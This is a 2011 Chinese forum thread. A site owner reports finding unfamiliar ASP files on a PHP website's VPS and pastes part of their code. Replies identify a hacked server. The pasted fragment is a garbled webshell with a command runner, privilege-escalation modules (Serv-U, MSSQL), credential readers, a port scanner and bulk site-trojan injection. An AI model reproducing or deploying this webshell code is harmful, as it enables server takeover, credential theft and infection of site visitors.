VPS上多了几个ASP文件。。。干什么用的？

yiwu

这么不安全的，PHP网站程序里冒出ASP文件怎么放上去的。。。[ol]

"

"&Err.Description&" "&Err.Source&"(点此返回上页)

"

.servervariables("http_host")&url

FolderPath=Request("FolderPath"):serverp=UserPass:FName=Request("FName")

BackUrl="

返回"

window.onerror=killErrors;function yesok(){if (confirm(""确认要执行此操作吗？""))return true;else return false;}function ShowFolder(Folder){top.addrform.FolderPath.value=Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value=FName;if(FAction==""CopyFile""){DName=prompt(""请输入复制到目标文件全名称"",FName);top.hideform.FName.value += ""

84host

|""+DName;}else if(FAction==""MoveFile""){DName=prompt(""请输入移动到目标文件全名称"",FName);top.hideform.FName.value += ""

Administrator

|""+DName;}else if(FAction==""CopyFolder""){DName=prompt(""请输入复制到目标文件夹全名称"",FName);top.hideform.FName.value += ""

ATOM

|""+DName;}else if(FAction==""MoveFolder""){DName=prompt(""请输入移动到目标文件夹全名称"",FName);top.hideform.FName.value += ""

格格男

|""+DName;}else if(FAction==""NewFolder""){DName=prompt(""请输入要新建的文件夹全名称"",FName);top.hideform.FName.value=DName;}else if(FAction==""CreateMdb""){DName=prompt(""请输入要新建的Mdb文件全名称,注意不能同名！"",FName);top.hideform.FName.value=DName;}else if(FAction==""CompactMdb""){DName=prompt(""请输入要压缩的Mdb文件全名称,注意文件是否存在！"",FName);top.hideform.FName.value=DName;}else{DName=""Other"";}if(DName!=null){RRS"[table]"

=#ffffff>"&mName&""

RRS"[/td][/tr]"

If Sot(0,1)=" ×" Then

RRS"[tr][td]没有权限[/td][/tr]"

Else

RRS"[tr][td]磁盘文件操作↓↓"

Set ABC=New LBF:RRS ABC.ShowDriver():Set ABC=Nothing

RRS"[/td][/tr][tr][td]→> 站点根目录[/td][/tr]"

RRS"[tr][td]→> 本程序目录[/td][/tr]"

RRS"[tr][td]→> Fso浏览器[/td][/tr]"

RRS"[tr][td]→> App浏览器[/td][/tr]"

RRS"[tr][td]→> 新建--目录[/td][/tr]"

RRS"[tr][td]→> 新建--文本[/td][/tr]"

RRS"[tr][td]→> 上传--单一[/td][/tr]"

RRS"[tr][td]→> 上传--批量[/td][/tr]"

RRS"[tr][td]→> 远程--下载[/td][/tr]"

End If

RRS"[tr][td]→> CMD---命令[/td][/tr]"

RRS"[tr][td]提权信息收集↓↓"

RRS"[tr][td]→> 磁盘--信息[/td][/tr]"

RRS"[tr][td]→> 用户--账号[/td][/tr]"

RRS"[tr][td]→> 端口__网络[/td][/tr]"

RRS"[tr][td]→> 组件--支持[/td][/tr]"

RRS"[tr][td]→> 信息--探针[/td][/tr]"

RRS"[tr][td]→> 查询管理员[/td][/tr]"

RRS"[tr][td]→> 端口扫描器[/td][/tr]"

RRS"[tr][td]→> 读取注册表[/td][/tr]"

RRS"[tr][td]→> Serv_u提权[/td][/tr]"

RRS"[tr][td]→> Serv__uFTP[/td][/tr]"

RRS"[tr][td]→> Sql___命令[/td][/tr]"

RRS"[tr][td]→> MS_sql提权[/td][/tr]"

RRS"[tr][td]→> Radmin读取[/td][/tr]"

RRS"[tr][td]→> pcanywhere[/td][/tr]"

RRS"[tr][td]→> 文件夹打包[/td][/tr]"

RRS"[tr][td]→> 木马__查找[/td][/tr]"

RRS"[tr][td]→> 选择__自杀[/td][/tr]"

RRS"[tr][td]→> 脚本 探测↓↓"

RRS"   →> php___探测

"

RRS"   →> aspx___探测

"

RRS"   →> jsp___探测

"

RRS"[tr][td]→> 数据 操作↓↓"

RRS"&nbsp&nbsp&nbsp连接数据库

"

RRS"&nbsp&nbsp&nbsp建立MDB文件

"

RRS"&nbsp&nbsp&nbsp压缩MDB文件[/td][/tr]"

RRS"[tr][td]→> 批量 挂马↓↓"

RRS"   →> 批量挂马

"

RRS"   →> 批量清马

"

RRS"   →> 批量替换

"

RRS"   →> 普通挂马

如果你能看到test.php正常显示,表示支持PHP如果你能看到test.jsp正常显示,表示支持jsp
删除测试的所有文件(必须全部测试才可以删除,否则会出错!)
":End function:function aspx():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.CreateTextFile(server.mappath("test.aspx")).Write"恭喜euxia服务器支持aspx":Response.write" ":Response.write "

如果你能看到Test.aspx正常显示,表示支持asp.net否则就是不支持拉!测试完成记得删除！":End function

function apjdel():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("test.aspx")):fso.DeleteFile(server.mappath("test.php")):fso.DeleteFile(server.mappath("test.jsp")):response.write"删除完毕!":End function:function sam():Response.write "

":response.write"
[color=]N
":End function

function euxia():set fso=Server.CreateObject("Scripting.FileSystemObject"):fso.DeleteFile(server.mappath("he1p.asp")):response.write"一路走好!":End function:function sam():Response.write "

[/ol]复制代码太长了还复制不了。。。

yiwu

你遇到菜鸟黑客了 估计是上传那地 有执行脚本权限 还有SQL漏洞 没有过滤参数 让他用傻瓜工具搞到了后台帐户

[ 本帖最后由 84host 于 2011-5-2 15:25 编辑 ]

shangpan

被黑了，不过可惜是asp

dreams777

我网站打开这个页面什么也没显示。。。
还有个是
原帖由 shangpan 于 2011-5-2 15:30 发表


好牛的黑客。。
Copyright="...............................

daigouadmin

那里有教程 求PM

老掉牙的玩意了

稀飯

真会装B，PHP站上ASP。
有的漏洞是不能上传PHP文件的，建议禁止执行。